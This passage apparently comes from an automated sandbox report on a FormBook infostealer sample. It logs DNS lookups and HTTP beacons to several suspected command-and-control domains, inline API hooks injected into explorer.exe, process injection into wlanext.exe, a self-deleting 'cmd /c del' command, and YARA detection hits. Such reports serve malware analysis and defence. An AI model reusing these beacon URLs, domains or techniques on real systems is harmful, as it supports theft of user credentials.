                                           Jul 4, 2024 16:36:07.800064087 CEST | 1.1.1.1 | 192.168.2.5 | 0x9e8d | No error (0) | www.serco2020.com | | 103.224.212.213 | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:36:27.958539963 CEST | 1.1.1.1 | 192.168.2.5 | 0xa6b8 | No error (0) | www.mrwine.xyz | | 3.64.163.50 | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:36:49.969120979 CEST | 1.1.1.1 | 192.168.2.5 | 0xf704 | No error (0) | www.cioncarp4213.com | 80717b6e07g.greycdn.net | | CNAME (Canonical name) | IN (0x0001) | false
                                           Jul 4, 2024 16:36:49.969120979 CEST | 1.1.1.1 | 192.168.2.5 | 0xf704 | No error (0) | 80717b6e07g.greycdn.net | 8cfc2069ey.greycdn.net | | CNAME (Canonical name) | IN (0x0001) | false
                                           Jul 4, 2024 16:36:49.969120979 CEST | 1.1.1.1 | 192.168.2.5 | 0xf704 | No error (0) | 8cfc2069ey.greycdn.net | 021562413z.greycdn.net | | CNAME (Canonical name) | IN (0x0001) | false
                                           Jul 4, 2024 16:36:49.969120979 CEST | 1.1.1.1 | 192.168.2.5 | 0xf704 | No error (0) | 021562413z.greycdn.net | | 128.1.131.130 | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:36:49.969204903 CEST | 1.1.1.1 | 192.168.2.5 | 0xf704 | No error (0) | www.cioncarp4213.com | 80717b6e07g.greycdn.net | | CNAME (Canonical name) | IN (0x0001) | false
                                           Jul 4, 2024 16:36:49.969204903 CEST | 1.1.1.1 | 192.168.2.5 | 0xf704 | No error (0) | 80717b6e07g.greycdn.net | 8cfc2069ey.greycdn.net | | CNAME (Canonical name) | IN (0x0001) | false
                                           Jul 4, 2024 16:36:49.969204903 CEST | 1.1.1.1 | 192.168.2.5 | 0xf704 | No error (0) | 8cfc2069ey.greycdn.net | 021562413z.greycdn.net | | CNAME (Canonical name) | IN (0x0001) | false
                                           Jul 4, 2024 16:36:49.969204903 CEST | 1.1.1.1 | 192.168.2.5 | 0xf704 | No error (0) | 021562413z.greycdn.net | | 128.1.131.130 | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:37:09.143701077 CEST | 1.1.1.1 | 192.168.2.5 | 0x6339 | No error (0) | www.520yhy.com | | 103.8.70.95 | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:37:29.602471113 CEST | 1.1.1.1 | 192.168.2.5 | 0x6150 | Name error (3) | www.byfchfyr.xyz | none | none | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:37:49.660924911 CEST | 1.1.1.1 | 192.168.2.5 | 0x744b | No error (0) | www.txglobedev.com | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:37:49.660924911 CEST | 1.1.1.1 | 192.168.2.5 | 0x744b | No error (0) | www.txglobedev.com | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:38:10.807018042 CEST | 1.1.1.1 | 192.168.2.5 | 0x147 | No error (0) | www.whysco.com | | 91.195.240.123 | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:38:31.654923916 CEST | 1.1.1.1 | 192.168.2.5 | 0x7fde | No error (0) | www.jesuscrewofficial.com | shops.myshopify.com | | CNAME (Canonical name) | IN (0x0001) | false
                                           Jul 4, 2024 16:38:31.654923916 CEST | 1.1.1.1 | 192.168.2.5 | 0x7fde | No error (0) | shops.myshopify.com | | 23.227.38.74 | A (IP address) | IN (0x0001) | false
                                          • www.yr8gl32.vip
                                          • www.cfuhtkwo.xyz
                                          • www.cpuk-finance.com
                                          • www.nearmeacupuncture.com
                                          • www.serco2020.com
                                          • www.mrwine.xyz
                                          • www.cioncarp4213.com
                                          • www.520yhy.com
                                          • www.txglobedev.com
                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                           0 | 192.168.2.5 | 49716 | 216.83.55.173 | 80 | 1028 | C:\Windows\explorer.exe
                                           Timestamp | Bytes transferred | Direction | Data
                                           Jul 4, 2024 16:34:26.175750017 CEST | 161 | OUT | GET /dy13/?IR=PvB4rkoJuXXI3XrovRSl0ulB4esZJCnJeomMIIs8xluNKDV17gKdZx+EfyXB3rEjLuJx&nL=S4247TXPfxsLR HTTP/1.1
                                          Host: www.yr8gl32.vip
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:


                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                           1 | 192.168.2.5 | 49717 | 154.204.100.23 | 80 | 1028 | C:\Windows\explorer.exe
                                           Timestamp | Bytes transferred | Direction | Data
                                           Jul 4, 2024 16:34:46.796763897 CEST | 162 | OUT | GET /dy13/?IR=tpMAOJT8TtRMsuChjA4iw3MPbwbvajf92oh/j4Ngt5fu8FRpUZDvCuNqhi68G9U6kaV7&nL=S4247TXPfxsLR HTTP/1.1
                                          Host: www.cfuhtkwo.xyz
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:


                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                           2 | 192.168.2.5 | 49719 | 185.151.30.212 | 80 | 1028 | C:\Windows\explorer.exe
                                           Timestamp | Bytes transferred | Direction | Data
                                           Jul 4, 2024 16:35:26.166423082 CEST | 166 | OUT | GET /dy13/?IR=gDxxMnsI36st3zAAJ1+A3hDmBOM78/3mfYHyjE1VNrqBuQQdV+RDpqUMPEu2QspRuVgT&nL=S4247TXPfxsLR HTTP/1.1
                                          Host: www.cpuk-finance.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:


                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                           3 | 192.168.2.5 | 49720 | 198.185.159.144 | 80 | 1028 | C:\Windows\explorer.exe
                                           Timestamp | Bytes transferred | Direction | Data
                                           Jul 4, 2024 16:35:46.877455950 CEST | 171 | OUT | GET /dy13/?IR=COXK5yT9Xx7VrCeWTqQC1HikmuY3GWnRD5VN4SaGvnHzB3wzqzXgI63okZhLDtLx1kx2&nL=S4247TXPfxsLR HTTP/1.1
                                          Host: www.nearmeacupuncture.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:


                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                           4 | 192.168.2.5 | 49721 | 103.224.212.213 | 80 | 1028 | C:\Windows\explorer.exe
                                           Timestamp | Bytes transferred | Direction | Data
                                           Jul 4, 2024 16:36:07.818486929 CEST | 163 | OUT | GET /dy13/?IR=7H41Cx9M/9Klm4wO2KyYkeGFvajkB7bQdwjfmZPzOjV6ZXjzQq6V6P6jcCKZla+kGSS1&nL=S4247TXPfxsLR HTTP/1.1
                                          Host: www.serco2020.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:


                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                           5 | 192.168.2.5 | 49722 | 3.64.163.50 | 80 | 1028 | C:\Windows\explorer.exe
                                           Timestamp | Bytes transferred | Direction | Data
                                           Jul 4, 2024 16:36:27.968302011 CEST | 160 | OUT | GET /dy13/?IR=nOOUddImUTrWJ0TERE8yX7QbQXzFXI1eXPVGsAvMbd1lknBUetPROzpkz9KaJDttVL7t&nL=S4247TXPfxsLR HTTP/1.1
                                          Host: www.mrwine.xyz
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:


                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                           6 | 192.168.2.5 | 49723 | 128.1.131.130 | 80 | 1028 | C:\Windows\explorer.exe
                                           Timestamp | Bytes transferred | Direction | Data
                                           Jul 4, 2024 16:36:49.977451086 CEST | 166 | OUT | GET /dy13/?IR=VyXmaWdZl+jwWdNk+AMtKckYhqijILaYAxW34tQVDb7UqFANvgHXRuyONC1nPUdS4yTi&nL=S4247TXPfxsLR HTTP/1.1
                                          Host: www.cioncarp4213.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:


                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                           7 | 192.168.2.5 | 49724 | 103.8.70.95 | 80 | 1028 | C:\Windows\explorer.exe
                                           Timestamp | Bytes transferred | Direction | Data
                                           Jul 4, 2024 16:37:09.149461031 CEST | 160 | OUT | GET /dy13/?IR=I05FyvQRVtD1nBL3W879G3rrifn+JaBOl79MbsgbL3I2Ix0E6XOmXaYbAYxT8R6qOP2I&nL=S4247TXPfxsLR HTTP/1.1
                                          Host: www.520yhy.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:


                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                           8 | 192.168.2.5 | 49725 | 188.114.97.3 | 80 | 1028 | C:\Windows\explorer.exe
                                           Timestamp | Bytes transferred | Direction | Data
                                           Jul 4, 2024 16:37:49.666945934 CEST | 164 | OUT | GET /dy13/?IR=HpLmp5lsG/78ww7PQ+32zrfZcWzFIxQC5ZchK1XnBOU/XUWwZI280oPADrvVA1p9LOCI&nL=S4247TXPfxsLR HTTP/1.1
                                          Host: www.txglobedev.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                           Jul 4, 2024 16:37:50.162930012 CEST | 1236 | IN | HTTP/1.1 403 Forbidden
                                          Date: Thu, 04 Jul 2024 14:37:50 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          X-Frame-Options: SAMEORIGIN
                                          Referrer-Policy: same-origin
                                          Cache-Control: max-age=15
                                          Expires: Thu, 04 Jul 2024 14:38:05 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0mPPvCPX69pcdROM7u5%2Fb0bkGZQlDADfUQbXkdcE%2B9yRj5Rme31K%2BqG8CruhJjR01jp2lTKm2BQRrLfTCFh9d9SpTsGuufrQ21vYbB%2BBW9ZrQtWG%2FAZ0n9g9t0wUrGPOPNULt1c%3D"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 89dfdb042ff043bc-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          Data Raw: 31 31 61 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 [TRUNCATED]
                                          Data Ascii: 11a3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots"
                                           Jul 4, 2024 16:37:50.162942886 CEST | 1236 | IN | Data Raw: 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69
                                          Data Ascii: content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css
                                           Jul 4, 2024 16:37:50.162957907 CEST | 448 | IN | Data Raw: 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                          Data Ascii: <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captcha-container --> <div class="cf-sectio
                                           Jul 4, 2024 16:37:50.162967920 CEST | 1236 | IN | Data Raw: 63 6b 65 64 5f 77 68 79 5f 64 65 74 61 69 6c 22 3e 54 68 69 73 20 77 65 62 73 69 74 65 20 69 73 20 75 73 69 6e 67 20 61 20 73 65 63 75 72 69 74 79 20 73 65 72 76 69 63 65 20 74 6f 20 70 72 6f 74 65 63 74 20 69 74 73 65 6c 66 20 66 72 6f 6d 20 6f
                                          Data Ascii: cked_why_detail">This website is using a security service to protect itself from online attacks. The action you just performed triggered the security solution. There are several actions that could trigger this block including submitting a cert
                                           Jul 4, 2024 16:37:50.162980080 CEST | 1061 | IN | Data Raw: 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 2d 62 74 6e 22 3e 43 6c 69 63
                                          Data Ascii: button type="button" id="cf-footer-ip-reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.33</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span>


                                          Code Manipulations

                                           Function Name | Hook Type | Active in Processes
                                           PeekMessageA | INLINE | explorer.exe
                                           PeekMessageW | INLINE | explorer.exe
                                           GetMessageW | INLINE | explorer.exe
                                           GetMessageA | INLINE | explorer.exe
                                           Function Name | Hook Type | New Data
                                           PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x8D 0xDE 0xE1
                                           PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x85 0x5E 0xE1
                                           GetMessageW | INLINE | 0x48 0x8B 0xB8 0x85 0x5E 0xE1
                                           GetMessageA | INLINE | 0x48 0x8B 0xB8 0x8D 0xDE 0xE1

                                          Target ID:0
                                          Start time:10:33:49
                                          Start date:04/07/2024
                                          Path:C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe"
                                          Imagebase:0x910000
                                          File size:621'056 bytes
                                          MD5 hash:A9C37F81CD9A181DAB2262D2F8456A76
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.2001523067.000000000467E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2001523067.000000000467E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2001523067.000000000467E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.2001523067.000000000467E000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.2001523067.000000000467E000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:low
                                          Has exited:true

                                          Target ID:3
                                          Start time:10:33:51
                                          Start date:04/07/2024
                                          Path:C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe"
                                          Imagebase:0xef0000
                                          File size:621'056 bytes
                                          MD5 hash:A9C37F81CD9A181DAB2262D2F8456A76
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:low
                                          Has exited:true

                                          Target ID:4
                                          Start time:10:33:51
                                          Start date:04/07/2024
                                          Path:C:\Windows\explorer.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\Explorer.EXE
                                          Imagebase:0x7ff674740000
                                          File size:5'141'208 bytes
                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:false

                                          Target ID:5
                                          Start time:10:33:52
                                          Start date:04/07/2024
                                          Path:C:\Windows\SysWOW64\wlanext.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\SysWOW64\wlanext.exe"
                                          Imagebase:0xfe0000
                                          File size:78'336 bytes
                                          MD5 hash:0D5F0A7CA2A8A47E3A26FB1CB67E118C
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.4449543692.0000000003070000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4449543692.0000000003070000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4449543692.0000000003070000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.4449543692.0000000003070000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.4449543692.0000000003070000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.4449465377.0000000003040000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4449465377.0000000003040000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4449465377.0000000003040000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.4449465377.0000000003040000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.4449465377.0000000003040000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:moderate
                                          Has exited:false

                                          Target ID:6
                                          Start time:10:33:56
                                          Start date:04/07/2024
                                          Path:C:\Windows\SysWOW64\cmd.exe
                                          Wow64 process (32bit):true
                                          Commandline:/c del "C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe"
                                          Imagebase:0x790000
                                          File size:236'544 bytes
                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:7
                                          Start time:10:33:56
                                          Start date:04/07/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true


                                            Execution Graph

                                            Execution Coverage:10.7%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:1.2%
                                            Total number of Nodes:405
                                            Total number of Limit Nodes:27
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2002943907.0000000005240000.00000040.00000800.00020000.00000000.sdmp, Offset: 05240000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5240000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1b74463e01bd7b4810e9d4a5316a27869e66169bfb63b4cb5b2635e73c9526a6
                                            • Instruction ID: dc96de16d5c90bab23401d0e3bb81d26c7f9bcf2977bb128e30154187f65ed5e
                                            • Opcode Fuzzy Hash: 1b74463e01bd7b4810e9d4a5316a27869e66169bfb63b4cb5b2635e73c9526a6
                                            • Instruction Fuzzy Hash: D8A2F874A10619CFCB14DF68C994AD9BBB2FF89300F1585E9D509AB361DB30AE85CF90
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2002943907.0000000005240000.00000040.00000800.00020000.00000000.sdmp, Offset: 05240000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5240000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c68fe3bdf18e41d9d13a006dbd6d16ac8c1a4e057a8d801370bfea91c4d57ab7
                                            • Instruction ID: ffa6d0e3691d84ea4cc246e8b3137575a395b7c0480ba1b5e926e5f635d5da07
                                            • Opcode Fuzzy Hash: c68fe3bdf18e41d9d13a006dbd6d16ac8c1a4e057a8d801370bfea91c4d57ab7
                                            • Instruction Fuzzy Hash: 0492E934A10619CFCB19DF64C998AD9B7B2FF8A304F1485E9D409AB361DB71AE85CF40
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2004020985.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7660000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d4142e76e224b0a91e8169a0fb6f7d004e2859e6d134b1a310797c91ef614b4c
                                            • Instruction ID: 169ce2bff5d3f7f9674bc5a26e85f89a8d3ecaea8814028f29ef22adeeed4c3a
                                            • Opcode Fuzzy Hash: d4142e76e224b0a91e8169a0fb6f7d004e2859e6d134b1a310797c91ef614b4c
                                            • Instruction Fuzzy Hash: DF21B6B1D116189BEB18CFA7D9593DEFBF2AFC9300F04C06AD409B62A4EB7409468F51

                                            Control-flow Graph

                                            APIs
                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07668D7E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2004020985.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7660000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: cf32be193cac4ac4db1b3c7fae527d0874d8d95f06b6e1dc55810b27e565cad0
                                            • Instruction ID: b4476746450f898303e6c09e0f4681d90d8e0cd85f869e5966031899f1d8910b
                                            • Opcode Fuzzy Hash: cf32be193cac4ac4db1b3c7fae527d0874d8d95f06b6e1dc55810b27e565cad0
                                            • Instruction Fuzzy Hash: B7A16BB1D0021ACFDB24DF69C844BEEBBB2BF48314F54856AD809A7240DB759985CF92

                                            Control-flow Graph

                                            APIs
                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07668D7E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2004020985.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7660000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: 31d04e13ba099f7a38c598cc2dccf2c4a7e7aa6dfe2781b26c21e839705c904a
                                            • Instruction ID: b1022b9c8b191e1e0e57f0802da8f1aaac4a1a603df05c1268b399915852ac32
                                            • Opcode Fuzzy Hash: 31d04e13ba099f7a38c598cc2dccf2c4a7e7aa6dfe2781b26c21e839705c904a
                                            • Instruction Fuzzy Hash: EA916BB1D0071ACFDB24CF69C844BEEBBB2BF48314F5485A9D809A7240DB749985CF92

                                            Control-flow Graph

                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 013CB086
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2000943195.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_13c0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: 11c95337bdbbe85418713ebe63fe68823fa6e69ae89e94757ffcdc7d1e11e739
                                            • Instruction ID: c0ef86ad406fcc0310790186e111428d27b9508bc046b698c1e0d9a83282d13f
                                            • Opcode Fuzzy Hash: 11c95337bdbbe85418713ebe63fe68823fa6e69ae89e94757ffcdc7d1e11e739
                                            • Instruction Fuzzy Hash: C27148B0A00B4A8FD724DF29D54475ABBF5FF88708F00892DD44AD7A90E775E949CB90

Control-flow Graph (rendered image; node/edge dump omitted): basic blocks 13c58b0-13c5a61, calling CreateActCtxA
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 013C59C9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2000943195.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_13c0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
